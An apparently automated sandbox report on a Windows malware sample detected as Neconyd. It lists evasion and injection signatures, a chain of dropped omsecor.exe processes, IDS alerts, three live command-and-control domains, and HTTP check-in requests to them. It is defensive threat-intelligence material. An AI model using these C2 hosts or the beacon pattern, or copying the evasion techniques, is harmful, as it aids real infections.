
Windows Analysis Report
fmlgbgc2p5.exe

Overview

General Information

Sample name: fmlgbgc2p5.exe (renamed because original name is a hash value)
Original sample name: 8b0613982b6a7f0542a7dbfce43aa216a043ce9a2a2a24a7a2c77a6e8fa6aa72.exe
Analysis ID: 1569339
MD5: 809d8bedb2da450b588bf82e9a118fe4
SHA1: 5cb2c9863ddc2ba5346967bf0780554c8dc120f9
SHA256: 8b0613982b6a7f0542a7dbfce43aa216a043ce9a2a2a24a7a2c77a6e8fa6aa72
Tags: exe, user-adrian__luca
Infos:

Detection

Neconyd
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Neconyd
C2 URLs / IPs found in malware configuration
Drops executables to the windows directory (C:\Windows) and starts them
Found API chain indicative of debugger detection
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
AV process strings found (often used to terminate AV products)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Entry point lies outside standard sections
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • fmlgbgc2p5.exe (PID: 7280 cmdline: "C:\Users\user\Desktop\fmlgbgc2p5.exe" MD5: 809D8BEDB2DA450B588BF82E9A118FE4)
    • fmlgbgc2p5.exe (PID: 7336 cmdline: C:\Users\user\Desktop\fmlgbgc2p5.exe MD5: 809D8BEDB2DA450B588BF82E9A118FE4)
      • omsecor.exe (PID: 7360 cmdline: C:\Users\user\AppData\Roaming\omsecor.exe MD5: 6E897A612472AD8B51062A6844A8A17B)
        • omsecor.exe (PID: 7452 cmdline: C:\Users\user\AppData\Roaming\omsecor.exe MD5: 6E897A612472AD8B51062A6844A8A17B)
          • omsecor.exe (PID: 8072 cmdline: C:\Windows\System32\omsecor.exe MD5: 678D56882701DBE0727C09DD075B56D1)
            • omsecor.exe (PID: 8100 cmdline: C:\Windows\SysWOW64\omsecor.exe MD5: 678D56882701DBE0727C09DD075B56D1)
              • omsecor.exe (PID: 8132 cmdline: C:\Users\user\AppData\Roaming\omsecor.exe MD5: A4BA09D8D586AF0201C2E6584BE09E59)
                • omsecor.exe (PID: 396 cmdline: C:\Users\user\AppData\Roaming\omsecor.exe MD5: A4BA09D8D586AF0201C2E6584BE09E59)
                  • omsecor.exe (PID: 7440 cmdline: C:\Windows\System32\omsecor.exe MD5: 75B0F2A9AD432A0DBC138A050D744956)
                    • omsecor.exe (PID: 7596 cmdline: C:\Windows\SysWOW64\omsecor.exe MD5: 75B0F2A9AD432A0DBC138A050D744956)
                      • omsecor.exe (PID: 7612 cmdline: C:\Users\user\AppData\Roaming\omsecor.exe MD5: 50E482AEFE2A49BBCB4AAEE1B8C70305)
                        • omsecor.exe (PID: 7296 cmdline: C:\Users\user\AppData\Roaming\omsecor.exe MD5: 50E482AEFE2A49BBCB4AAEE1B8C70305)
                        • WerFault.exe (PID: 1168 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7612 -s 260 MD5: C31336C1EFC2CCB44B4326EA793040F2)
                    • WerFault.exe (PID: 336 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7440 -s 248 MD5: C31336C1EFC2CCB44B4326EA793040F2)
                • WerFault.exe (PID: 424 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 8132 -s 276 MD5: C31336C1EFC2CCB44B4326EA793040F2)
            • WerFault.exe (PID: 8144 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 8072 -s 280 MD5: C31336C1EFC2CCB44B4326EA793040F2)
        • WerFault.exe (PID: 7564 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7360 -s 276 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 7424 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7280 -s 304 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
{"C2 url": ["http://mkkuei4kdsz.com/", "http://ow5dirasuek.com/", "http://lousta.net/"]}
Source | Rule | Description | Author | Strings
Process Memory Space: fmlgbgc2p5.exe PID: 7280 | JoeSecurity_Neconyd | Yara detected Neconyd | Joe Security |
Process Memory Space: fmlgbgc2p5.exe PID: 7336 | JoeSecurity_Neconyd | Yara detected Neconyd | Joe Security |
Process Memory Space: omsecor.exe PID: 7360 | JoeSecurity_Neconyd | Yara detected Neconyd | Joe Security |
Process Memory Space: omsecor.exe PID: 7452 | JoeSecurity_Neconyd | Yara detected Neconyd | Joe Security |
Process Memory Space: omsecor.exe PID: 8072 | JoeSecurity_Neconyd | Yara detected Neconyd | Joe Security |
No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-05T18:09:19.895177+0100 | 2016998 | 1 | A Network Trojan was detected | 192.168.2.7 | 49708 | 193.166.255.171 | 80 | TCP
2024-12-05T18:10:07.909220+0100 | 2018141 | 1 | A Network Trojan was detected | 52.34.198.229 | 80 | 192.168.2.7 | 49833 | TCP
2024-12-05T18:10:07.909220+0100 | 2037771 | 1 | A Network Trojan was detected | 52.34.198.229 | 80 | 192.168.2.7 | 49833 | TCP
2024-12-05T18:09:13.072527+0100 | 2015786 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 50001 | 193.166.255.171 | 80 | TCP
2024-12-05T18:09:41.929645+0100 | 2015786 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49708 | 193.166.255.171 | 80 | TCP
2024-12-05T18:10:04.071060+0100 | 2015786 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49771 | 193.166.255.171 | 80 | TCP
2024-12-05T18:10:05.646999+0100 | 2015786 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49827 | 15.197.204.56 | 80 | TCP
2024-12-05T18:10:07.719093+0100 | 2015786 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49833 | 52.34.198.229 | 80 | TCP
2024-12-05T18:10:32.196627+0100 | 2015786 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49844 | 193.166.255.171 | 80 | TCP
2024-12-05T18:10:54.384861+0100 | 2015786 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49898 | 193.166.255.171 | 80 | TCP
2024-12-05T18:10:55.730671+0100 | 2015786 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49951 | 15.197.204.56 | 80 | TCP
2024-12-05T18:10:57.327496+0100 | 2015786 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49955 | 52.34.198.229 | 80 | TCP
2024-12-05T18:11:21.525774+0100 | 2015786 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49963 | 193.166.255.171 | 80 | TCP


AV Detection

Source: fmlgbgc2p5.exe | Avira: detected
Source: http://mkkuei4kdsz.com/ | Avira URL Cloud: Label: phishing
Source: http://mkkuei4kdsz.com/441/819.html | Avira URL Cloud: Label: phishing
Source: http://lousta.net/349/212.html | Avira URL Cloud: Label: phishing
Source: http://lousta.net/ | Avira URL Cloud: Label: phishing
Source: http://lousta.net/952/351.htmlU? | Avira URL Cloud: Label: phishing
Source: http://lousta.net/952/351.html_ | Avira URL Cloud: Label: phishing
Source: http://lousta.net/370/988.html | Avira URL Cloud: Label: phishing
Source: http://lousta.net/952/351.htmlf? | Avira URL Cloud: Label: phishing
Source: http://lousta.net/349/212.htmlD | Avira URL Cloud: Label: phishing
Source: http://lousta.net/952/351.htmlx?3 | Avira URL Cloud: Label: phishing
Source: http://lousta.net/952/351.htmlshqos.dll.mui= | Avira URL Cloud: Label: phishing
Source: http://ow5dirasuek.com/612/675.htmlc | Avira URL Cloud: Label: phishing
Source: http://lousta.net/400/589.html | Avira URL Cloud: Label: phishing
Source: http://ow5dirasuek.com/612/675.html | Avira URL Cloud: Label: phishing
Source: http://mkkuei4kdsz.com/8 | Avira URL Cloud: Label: phishing
Source: http://ow5dirasuek.com/612/675.html% | Avira URL Cloud: Label: phishing
Source: http://lousta.net/400/589.htmlx | Avira URL Cloud: Label: phishing
Source: http://lousta.net/rontdesk | Avira URL Cloud: Label: phishing
Source: http://lousta.net/206/582.html | Avira URL Cloud: Label: phishing
Source: http://ow5dirasuek.com/358/336.html | Avira URL Cloud: Label: phishing
Source: http://ow5dirasuek.com/~ | Avira URL Cloud: Label: phishing
Source: http://lousta.net/952/351.html6 | Avira URL Cloud: Label: phishing
Source: http://lousta.net/349/212.html5T | Avira URL Cloud: Label: phishing
Source: http://lousta.net/952/351.htmlA | Avira URL Cloud: Label: phishing
Source: http://lousta.net/952/351.html | Avira URL Cloud: Label: phishing
Source: http://mkkuei4kdsz.com/931/166.html | Avira URL Cloud: Label: phishing
Source: http://ow5dirasuek.com/http://mkkuei4kdsz.com/http://lousta.net/http://lousta.net/begun.ruIueiOodcon | Avira URL Cloud: Label: phishing
Source: http://ow5dirasuek.com/612/675.html-8a8d424fbe43573ef1LMEM | Avira URL Cloud: Label: phishing
Source: http://lousta.net/370/988.html= | Avira URL Cloud: Label: phishing
Source: http://lousta.net/206/582.htmlO2 | Avira URL Cloud: Label: phishing
Source: http://lousta.net/0 | Avira URL Cloud: Label: phishing
Source: http://lousta.net/349/212.html.T | Avira URL Cloud: Label: phishing
Source: http://lousta.net/952/351.html) | Avira URL Cloud: Label: phishing
Source: http://lousta.net/861/856.html | Avira URL Cloud: Label: phishing
Source: http://ow5dirasuek.com/ | Avira URL Cloud: Label: phishing
Source: C:\Windows\SysWOW64\omsecor.exe | Avira: detection malicious, Label: HEUR/AGEN.1352667
Source: C:\Users\user\AppData\Roaming\omsecor.exe | Avira: detection malicious, Label: HEUR/AGEN.1352667
Source: 0.2.fmlgbgc2p5.exe.4a5548.1.unpack | Malware Configuration Extractor: Neconyd {"C2 url": ["http://mkkuei4kdsz.com/", "http://ow5dirasuek.com/", "http://lousta.net/"]}
Source: fmlgbgc2p5.exe | ReversingLabs: Detection: 89%
Source: C:\Windows\SysWOW64\omsecor.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\omsecor.exe | Joe Sandbox ML: detected
Source: fmlgbgc2p5.exe | Joe Sandbox ML: detected

Compliance

Source: C:\Users\user\Desktop\fmlgbgc2p5.exe | Unpacked PE file: 2.2.fmlgbgc2p5.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\omsecor.exe | Unpacked PE file: 7.2.omsecor.exe.400000.0.unpack
Source: C:\Windows\SysWOW64\omsecor.exe | Unpacked PE file: 14.2.omsecor.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\omsecor.exe | Unpacked PE file: 18.2.omsecor.exe.400000.0.unpack
Source: C:\Windows\SysWOW64\omsecor.exe | Unpacked PE file: 24.2.omsecor.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\omsecor.exe | Unpacked PE file: 28.2.omsecor.exe.400000.0.unpack
Source: fmlgbgc2p5.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\fmlgbgc2p5.exe | Code function: 0_2_004012C0 FindFirstFileA, | 0_2_004012C0
Source: C:\Users\user\Desktop\fmlgbgc2p5.exe | Code function: 2_2_0040ABD9 FindFirstFileW,FindClose, | 2_2_0040ABD9
Source: C:\Users\user\Desktop\fmlgbgc2p5.exe | Code function: 2_2_00408248 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose, | 2_2_00408248
Source: C:\Users\user\AppData\Roaming\omsecor.exe | Code function: 4_2_004012C0 FindFirstFileA, | 4_2_004012C0
Source: C:\Users\user\AppData\Roaming\omsecor.exe | Code function: 7_2_0040ABD9 FindFirstFileW,FindClose, | 7_2_0040ABD9
Source: C:\Users\user\AppData\Roaming\omsecor.exe | Code function: 7_2_00408248 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose, | 7_2_00408248
Source: C:\Windows\SysWOW64\omsecor.exe | Code function: 13_2_004012C0 FindFirstFileA, | 13_2_004012C0
Source: C:\Windows\SysWOW64\omsecor.exe | Code function: 14_2_0040ABD9 FindFirstFileW,FindClose, | 14_2_0040ABD9
Source: C:\Windows\SysWOW64\omsecor.exe | Code function: 14_2_00408248 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose, | 14_2_00408248
Source: C:\Users\user\AppData\Roaming\omsecor.exe | Code function: 16_2_004012C0 FindFirstFileA, | 16_2_004012C0
Source: C:\Users\user\AppData\Roaming\omsecor.exe | Code function: 18_2_0040ABD9 FindFirstFileW,FindClose, | 18_2_0040ABD9
Source: C:\Users\user\AppData\Roaming\omsecor.exe | Code function: 18_2_00408248 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose, | 18_2_00408248
Source: C:\Windows\SysWOW64\omsecor.exe | Code function: 23_2_004012C0 FindFirstFileA, | 23_2_004012C0
Source: C:\Windows\SysWOW64\omsecor.exe | Code function: 24_2_0040ABD9 FindFirstFileW,FindClose, | 24_2_0040ABD9
Source: C:\Windows\SysWOW64\omsecor.exe | Code function: 24_2_00408248 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose, | 24_2_00408248
Source: C:\Users\user\AppData\Roaming\omsecor.exe | Code function: 26_2_004012C0 FindFirstFileA, | 26_2_004012C0
Source: C:\Users\user\AppData\Roaming\omsecor.exe | Code function: 28_2_0040ABD9 FindFirstFileW,FindClose, | 28_2_0040ABD9
Source: C:\Users\user\AppData\Roaming\omsecor.exe | Code function: 28_2_00408248 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose, | 28_2_00408248

Networking

Source: Network traffic | Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.7:49708 -> 193.166.255.171:80
Source: Network traffic | Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.7:49771 -> 193.166.255.171:80
Source: Network traffic | Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.7:49833 -> 52.34.198.229:80
Source: Network traffic | Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.7:49827 -> 15.197.204.56:80
Source: Network traffic | Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.7:49844 -> 193.166.255.171:80
Source: Network traffic | Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.7:49898 -> 193.166.255.171:80
Source: Network traffic | Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.7:49951 -> 15.197.204.56:80
Source: Network traffic | Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.7:49955 -> 52.34.198.229:80
Source: Network traffic | Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.7:49963 -> 193.166.255.171:80
Source: Network traffic | Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.7:50001 -> 193.166.255.171:80
Source: Malware configuration extractor | URLs: http://mkkuei4kdsz.com/
Source: Malware configuration extractor | URLs: http://ow5dirasuek.com/
Source: Malware configuration extractor | URLs: http://lousta.net/
Source: global traffic | HTTP traffic detected: GET /370/988.html HTTP/1.1  From: 133778921561632797  Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>.261e7/d4`7b3bc15212dc72^78-2148  Host: lousta.net  Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /400/589.html HTTP/1.1  From: 133778921561632797  Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>.261e7/d4`7b3bc15212dc72^78-2148  Host: lousta.net  Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /931/166.html HTTP/1.1  From: 133778921561632797  Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>.261e7/d4`7b3bc15212dc72^78-2148  Host: mkkuei4kdsz.com  Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /612/675.html HTTP/1.1  From: 133778921561632797  Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>.261e7/d4`7b3bc15212dc72^78-2148  Host: ow5dirasuek.com  Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /206/582.html HTTP/1.1  From: 133778921561632797  Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>.261e7/d4`7b3bc15212dc72^78-2148  Host: lousta.net  Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /861/856.html HTTP/1.1  From: 133778921561632797  Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>.261e7/d4`7b3bc15212dc72^78-2148  Host: lousta.net  Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /441/819.html HTTP/1.1  From: 133778921561632797  Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>.261e7/d4`7b3bc15212dc72^78-2148  Host: mkkuei4kdsz.com  Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /358/336.html HTTP/1.1  From: 133778921561632797  Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>.261e7/d4`7b3bc15212dc72^78-2148  Host: ow5dirasuek.com  Connection: Keep-Alive  Cookie: snkz=8.46.123.228; btst=761ae05900180e6968d7f120981b37d6|8.46.123.228|1733418607|1733418607|0|1|0
Source: global traffic | HTTP traffic detected: GET /349/212.html HTTP/1.1  From: 133778921561632797  Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>.261e7/d4`7b3bc15212dc72^78-2148  Host: lousta.net  Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /952/351.html HTTP/1.1  From: 133778921561632797  Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>.261e7/d4`7b3bc15212dc72^78-2148  Host: lousta.net  Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 193.166.255.171 193.166.255.171
Source: Joe Sandbox View | IP Address: 52.34.198.229 52.34.198.229
Source: Joe Sandbox View | ASN Name: FUNETASFI FUNETASFI
Source: Joe Sandbox View | ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View | ASN Name: TANDEMUS TANDEMUS
Source: Network traffic | Suricata IDS: 2016998 - Severity 1 - ET MALWARE Connection to Fitsec Sinkhole IP (Possible Infected Host) : 192.168.2.7:49708 -> 193.166.255.171:80
Source: Network traffic | Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 52.34.198.229:80 -> 192.168.2.7:49833
Source: Network traffic | Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 52.34.198.229:80 -> 192.168.2.7:49833
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\fmlgbgc2p5.exe | Code function: 2_2_00407036 Sleep,DeleteFileW,CreateFileW,GetLastError,SetEndOfFile,InternetOpenUrlW,CloseHandle,InternetQueryDataAvailable,InternetReadFile,WriteFile,InternetReadFile,CloseHandle,InternetCloseHandle, | 2_2_00407036
Source: global traffic | HTTP traffic detected: GET /370/988.html HTTP/1.1  From: 133778921561632797  Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>.261e7/d4`7b3bc15212dc72^78-2148  Host: lousta.net  Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /400/589.html HTTP/1.1  From: 133778921561632797  Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>.261e7/d4`7b3bc15212dc72^78-2148  Host: lousta.net  Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /931/166.html HTTP/1.1  From: 133778921561632797  Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>.261e7/d4`7b3bc15212dc72^78-2148  Host: mkkuei4kdsz.com  Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /612/675.html HTTP/1.1  From: 133778921561632797  Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>.261e7/d4`7b3bc15212dc72^78-2148  Host: ow5dirasuek.com  Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /206/582.html HTTP/1.1  From: 133778921561632797  Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>.261e7/d4`7b3bc15212dc72^78-2148  Host: lousta.net  Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /861/856.html HTTP/1.1  From: 133778921561632797  Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>.261e7/d4`7b3bc15212dc72^78-2148  Host: lousta.net  Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /441/819.html HTTP/1.1  From: 133778921561632797  Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>.261e7/d4`7b3bc15212dc72^78-2148  Host: mkkuei4kdsz.com  Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /358/336.html HTTP/1.1  From: 133778921561632797  Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>.261e7/d4`7b3bc15212dc72^78-2148  Host: ow5dirasuek.com  Connection: Keep-Alive  Cookie: snkz=8.46.123.228; btst=761ae05900180e6968d7f120981b37d6|8.46.123.228|1733418607|1733418607|0|1|0
Source: global traffic | HTTP traffic detected: GET /349/212.html HTTP/1.1  From: 133778921561632797  Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>.261e7/d4`7b3bc15212dc72^78-2148  Host: lousta.net  Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /952/351.html HTTP/1.1  From: 133778921561632797  Via: dlngfrn[rfs=8-5_`oeb=6[pboan:11-0102_ls>321.^lby>.261e7/d4`7b3bc15212dc72^78-2148  Host: lousta.net  Connection: Keep-Alive
Source: global traffic | DNS traffic detected: DNS query: lousta.net
Source: global traffic | DNS traffic detected: DNS query: mkkuei4kdsz.com
Source: global traffic | DNS traffic detected: DNS query: ow5dirasuek.com
Source: omsecor.exe | String found in binary or memory: http://lousta.net/
Source: omsecor.exe, 0000001C.00000002.2589203177.0000000000194000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: http://lousta.net/0
Source: omsecor.exe, 00000012.00000002.2334469520.0000000000668000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000012.00000002.2334469520.00000000006A2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lousta.net/206/582.html
Source: omsecor.exe, 00000012.00000002.2334469520.0000000000668000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lousta.net/206/582.htmlO2
Source: omsecor.exe, 0000001C.00000002.2589585236.00000000004A8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lousta.net/349/212.html
Source: omsecor.exe, 0000001C.00000002.2589585236.00000000004A8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lousta.net/349/212.html.T
Source: omsecor.exe, 0000001C.00000002.2589585236.00000000004A8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lousta.net/349/212.html5T
Source: omsecor.exe, 0000001C.00000002.2589585236.00000000004A8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lousta.net/349/212.htmlD
Source: omsecor.exe, 0000001C.00000002.2589585236.00000000004E3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lousta.net/349/212.htmld
Source: omsecor.exe, 00000007.00000002.1840387008.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000007.00000002.1840387008.0000000000603000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lousta.net/370/988.html
Source: omsecor.exe, 00000007.00000002.1840387008.00000000005C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lousta.net/370/988.html=
Source: omsecor.exe, 00000007.00000002.1840387008.0000000000603000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lousta.net/400/589.html
Source: omsecor.exe, 00000007.00000002.1840387008.0000000000603000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lousta.net/400/589.htmlx
Source: omsecor.exe, 00000012.00000002.2334469520.00000000006A2000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000012.00000002.2334469520.00000000006C0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lousta.net/861/856.html
Source: omsecor.exe, 0000001C.00000002.2589585236.00000000004E3000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 0000001C.00000002.2589585236.00000000004F6000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 0000001C.00000002.2589203177.0000000000194000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: http://lousta.net/952/351.html
Source: omsecor.exe, 0000001C.00000002.2589585236.00000000004F6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lousta.net/952/351.html)
Source: omsecor.exe, 0000001C.00000002.2589585236.00000000004F6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lousta.net/952/351.html6
Source: omsecor.exe, 0000001C.00000002.2589585236.00000000004F6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lousta.net/952/351.htmlA
Source: omsecor.exe, 0000001C.00000002.2589585236.00000000004E3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lousta.net/952/351.htmlU?
Source: omsecor.exe, 0000001C.00000002.2589585236.00000000004F6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lousta.net/952/351.html_
Source: omsecor.exe, 0000001C.00000002.2589585236.00000000004E3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lousta.net/952/351.htmlf?
Source: omsecor.exe, 0000001C.00000002.2589585236.00000000004E3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lousta.net/952/351.htmlshqos.dll.mui=
Source: omsecor.exe, 0000001C.00000002.2589585236.00000000004E3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lousta.net/952/351.htmlx?3
Source: omsecor.exe, 00000007.00000002.1840387008.0000000000603000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lousta.net/rontdesk
Source: omsecor.exe | String found in binary or memory: http://mkkuei4kdsz.com/
Source: omsecor.exe, 00000012.00000002.2334469520.0000000000668000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000012.00000002.2334469520.00000000006A2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://mkkuei4kdsz.com/441/819.html
Source: omsecor.exe, 00000007.00000002.1840387008.0000000000622000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://mkkuei4kdsz.com/8
Source: omsecor.exe, 00000007.00000002.1840387008.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000007.00000002.1840387008.0000000000603000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000007.00000002.1840387008.0000000000619000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://mkkuei4kdsz.com/931/166.html
Source: omsecor.exe | String found in binary or memory: http://ow5dirasuek.com/
Source: omsecor.exe, 00000012.00000002.2334288604.0000000000194000.00000004.00000010.00020000.00000000.sdmp, omsecor.exe, 00000012.00000002.2334469520.0000000000668000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000012.00000002.2334469520.00000000006A2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ow5dirasuek.com/358/336.html
Source: omsecor.exe, 00000007.00000002.1840387008.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000007.00000002.1840387008.0000000000603000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000007.00000002.1840198847.0000000000194000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: http://ow5dirasuek.com/612/675.html
